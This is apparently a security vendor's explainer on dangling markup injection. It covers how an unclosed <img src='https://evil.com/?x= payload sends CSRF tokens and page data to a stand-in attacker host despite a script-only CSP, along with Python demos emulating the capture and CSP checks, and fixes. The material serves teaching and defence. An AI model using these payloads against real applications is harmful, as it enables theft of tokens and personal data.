Severity: Medium | OWASP A03:2021 Injection | CWE-116 (Improper Encoding or Escaping of Output)

Dangling Markup Injection

When CSP blocks inline and untrusted scripts but a parameter is still reflected into HTML without encoding, an unclosed tag whose attribute points at an attacker's server turns the page content that follows it into part of that URL, and the browser sends it there.

What Is Dangling Markup Injection?

Dangling Markup Injection is a technique for exfiltrating page content when user input is reflected into HTML without proper encoding and Content Security Policy (CSP) prevents the usual script-based XSS. Instead of injecting a <script> tag (which a nonce- or hash-based script-src blocks), the attacker injects a tag whose attribute value is never closed, such as <img src='https://evil.com/?x= (an <a href=' or <form action=' works the same way). The HTML tokenizer treats everything between the injection point and the next matching quote character as the attribute value, so whatever markup and data sits after the injection point becomes part of the URL the browser requests from the attacker's host.

How It Works

The application reflects a parameter without HTML encoding. With the attacker supplying <img src='https://evil.com/?x= as the value, the rendered page becomes:

<div class="greeting">Hello, <img src='https://evil.com/?x=!</div>
<input type="hidden" name="csrf_token" value="abc123">
<div class="account">Balance: $4,200</div>

The unclosed <img src=' leaves the parser inside an attribute value delimited by single quotes. The lines that follow use only double quotes, so the value keeps running past the CSRF token and the account balance until the next single quote on the page (an apostrophe in some later text, for instance). The raw attribute value is therefore:

https://evil.com/?x=!</div><input type="hidden" name="csrf_token" value="abc123"><div class="account">Balance: $4,200</div>...

The browser then issues an image request to evil.com with all of this data in the query string (reserved characters such as <, > and the double quotes are percent-encoded on the wire, but the attacker decodes them trivially). Two conditions apply: the page's CSP must not restrict img-src (or default-src) to trusted hosts, since the request is an ordinary image load, and the browser must not apply its own dangling-markup mitigation. Chromium-based browsers refuse a resource request whose raw URL contains both a newline and a < character, which catches pretty-printed HTML like the example above but not a minified page where the captured region contains no newline.
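What the browser's HTML and URL handling do with the snippet above, as an added example that is not part of this page or of VibeWShield's scanner: it reflects the payload into a constructed page modelled on the example, emulates the tokenizer's capture up to the next single quote, builds the URL the image request carries, applies the Chromium newline-plus-< check, and contrasts this with an encoded reflection (html.escape stands in for markupsafe.escape from the fix section). The evil.com host, the x parameter and the footer line with the closing apostrophe are assumptions taken from or added to the snippet.

```python
import html
from typing import Optional, Tuple
from urllib.parse import quote

# Constructed page modelled on the snippet above; {name} is where the parameter lands.
# The apostrophe in the footer is the next single quote after the injection point,
# so it is what finally terminates the dangling src=' attribute.
PAGE = (
    '<div class="greeting">Hello, {name}!</div>\n'
    '<input type="hidden" name="csrf_token" value="abc123">\n'
    '<div class="account">Balance: $4,200</div>\n'
    "<footer>Don't share your token.</footer>\n"
)

# Attacker-supplied value of the reflected parameter (evil.com as in the text above).
PAYLOAD = "<img src='https://evil.com/?x="


def render_vulnerable(name: str, minified: bool = False) -> str:
    """Reflect the parameter verbatim (the bug). minified=True drops the newlines,
    as a template minifier would, which matters for the Chromium check below."""
    page = PAGE.replace("\n", "") if minified else PAGE
    return page.replace("{name}", name)


def render_fixed(name: str) -> str:
    """HTML-encode before reflecting. html.escape(quote=True) encodes & < > " and ',
    the same set markupsafe.escape() encodes."""
    return PAGE.replace("{name}", html.escape(name, quote=True))


def captured_by_dangling_attr(page_html: str, payload: str) -> Optional[str]:
    """Emulate the tokenizer: once the parser is inside src='..., the attribute value
    runs up to the next single quote, markup and all. Returns None when the payload
    is not present verbatim, i.e. it was encoded and no attribute was ever opened."""
    start = page_html.find(payload)
    if start == -1:
        return None
    rest = page_html[start + len(payload):]
    end = rest.find("'")
    return rest if end == -1 else rest[:end]


def exfil_url(page_html: str, payload: str) -> Optional[Tuple[str, str]]:
    """Return (raw_url, wire_url): the attribute value exactly as parsed, and an
    approximation of what goes on the wire after URL normalisation (tabs and newlines
    stripped, reserved characters percent-encoded; the exact safe set varies by browser)."""
    captured = captured_by_dangling_attr(page_html, payload)
    if captured is None:
        return None
    base = payload[len("<img src='"):]          # https://evil.com/?x=
    raw = base + captured
    wire = base + quote(captured.replace("\n", "").replace("\t", ""), safe="/:=&")
    return raw, wire


def chromium_blocks(raw_url: str) -> bool:
    """Chromium's dangling-markup mitigation refuses a resource request whose raw URL
    contains both a newline and '<'. A minified page leaves no newline to trip it."""
    return "\n" in raw_url and "<" in raw_url


if __name__ == "__main__":
    page = render_vulnerable(PAYLOAD)
    raw, wire = exfil_url(page, PAYLOAD)
    print("captured:", repr(captured_by_dangling_attr(page, PAYLOAD)))
    print("on the wire:", wire)
    print("blocked by Chromium:", chromium_blocks(raw))
    raw_min, _ = exfil_url(render_vulnerable(PAYLOAD, minified=True), PAYLOAD)
    print("blocked when the page is minified:", chromium_blocks(raw_min))
    print("encoded reflection exfiltrates:", exfil_url(render_fixed(PAYLOAD), PAYLOAD))
```

Running it shows the captured value ending at "<footer>Don", the CSRF token inside it, the pretty-printed page tripping the Chromium check, the minified page passing it, and the encoded page yielding no attribute at all.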

Real-World Impact

  • CSRF token theft — steal anti-CSRF tokens to perform state-changing actions
  • PII exfiltration — capture account data, emails, phone numbers displayed on the page
  • CSP bypass — works under a nonce- or hash-based script-src that blocks every inline and untrusted script, because the exfiltration is an ordinary image load (or form submission); only an img-src/default-src (or form-action) that excludes the attacker's host stops it
  • Session data leakage — any sensitive data rendered after the injection point

How to Fix

HTML-encode all reflected output, in every context where it is inserted (text and attribute values alike):

from markupsafe import escape  # Jinja2/Flask's escaper; encodes & < > " and '
# The injected <img src=' renders as literal text, so no attribute is ever opened.
output = f"Hello, {escape(user_input)}!"

Use framework auto-escaping and do not switch it off for reflected data: React JSX escapes text content (but not dangerouslySetInnerHTML), Django templates escape by default unless output is wrapped in {% autoescape off %} or marked |safe, and Jinja2 escapes only when autoescaping is enabled (Flask enables it for .html templates).

Treat CSP as defence in depth, not as the fix: restrict where the page may load resources from and submit forms to (default-src and img-src, plus form-action, limited to trusted origins) so that an injected URL to an attacker's host is refused, and set base-uri 'none' to block the related <base> tag injection. A nonce-based script-src on its own does not stop this attack.
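To make the CSP point concrete, an added example that is neither VibeWShield's code nor anything from the original page: a reduced CSP evaluator that answers whether a given policy lets the browser issue the image request from the example above. It models only the source expressions it needs ('self', 'none', *, scheme:, host, *.host) and the default-src fallback rules; ports, paths, nonces, hashes and 'strict-dynamic' are deliberately left out. The policies, app.example.com and cdn.example.com are constructed for the demonstration.

```python
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Directives that do NOT fall back to default-src when absent (per CSP3).
NO_DEFAULT_FALLBACK = {"base-uri", "form-action", "frame-ancestors"}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Turn a Content-Security-Policy header into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_matches(expr: str, page_origin: str, url: str) -> bool:
    """Reduced CSP source-expression match: 'self', 'none', *, scheme:, host, *.host.
    Ports, paths, nonces, hashes and 'strict-dynamic' are not modelled (assumption)."""
    target = urlsplit(url)
    expr = expr.lower()
    if expr == "'none'":
        return False
    if expr == "'self'":
        return f"{target.scheme}://{target.netloc}" == page_origin.lower()
    if expr == "*":
        return True
    if expr.endswith(":"):                                 # scheme-source such as https:
        return target.scheme == expr[:-1]
    host = expr.split("://", 1)[-1].split("/", 1)[0]      # host-source: drop scheme and path
    if host.startswith("*."):
        return bool(target.hostname) and target.hostname.endswith(host[1:])
    return target.hostname == host


def csp_allows(header: str, directive: str, page_origin: str, url: str) -> bool:
    """Would the browser honour a request for `url` governed by `directive`?
    Falls back to default-src like a browser does, except for the directives above;
    no applicable source list means the policy does not restrict that request."""
    policy = parse_csp(header)
    sources: Optional[List[str]] = policy.get(directive)
    if sources is None and directive not in NO_DEFAULT_FALLBACK:
        sources = policy.get("default-src")
    if sources is None:
        return True
    return any(source_matches(s, page_origin, url) for s in sources)


# Constructed policies and URLs for the demonstration.
ORIGIN = "https://app.example.com"
EXFIL = "https://evil.com/?x=%3C/div%3E..."          # the dangling-markup image request
SCRIPT_ONLY = "script-src 'nonce-r4nd0m'; object-src 'none'; base-uri 'none'"
LOCKED_DOWN = ("default-src 'self'; script-src 'nonce-r4nd0m'; "
               "img-src 'self' https://cdn.example.com; form-action 'self'; base-uri 'none'")

if __name__ == "__main__":
    print("script-only CSP lets the image load:", csp_allows(SCRIPT_ONLY, "img-src", ORIGIN, EXFIL))
    print("locked-down CSP lets the image load:", csp_allows(LOCKED_DOWN, "img-src", ORIGIN, EXFIL))
    print("locked-down CSP still serves the CDN:",
          csp_allows(LOCKED_DOWN, "img-src", ORIGIN, "https://cdn.example.com/logo.png"))
    print("default-src alone covers a dangling <form action=:",
          not csp_allows("default-src 'self'", "form-action", ORIGIN, EXFIL))
```

The last line is the trap worth remembering: form-action does not inherit from default-src, so a policy that locks down img-src but never sets form-action still lets a dangling <form action='https://evil.com/... submit the captured content.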

What VibeWShield Detects

VibeWShield's Dangling Markup scanner injects an <img src= payload pointing at a unique canary domain into each reflected parameter. If the unclosed tag comes back in the response unencoded, the finding confirms that page content after the injection point can be exfiltrated. The check is a single request per parameter and only inspects the reflection, so it adds no load and causes no harm to the target.

Tags: #dangling-markup #csp-bypass #html-injection #data-exfiltration

Test your app for Dangling Markup Injection

VibeWShield automatically checks for Dangling Markup Injection and 40+ other vulnerabilities using 63 scanners — in under 3 minutes, no signup required.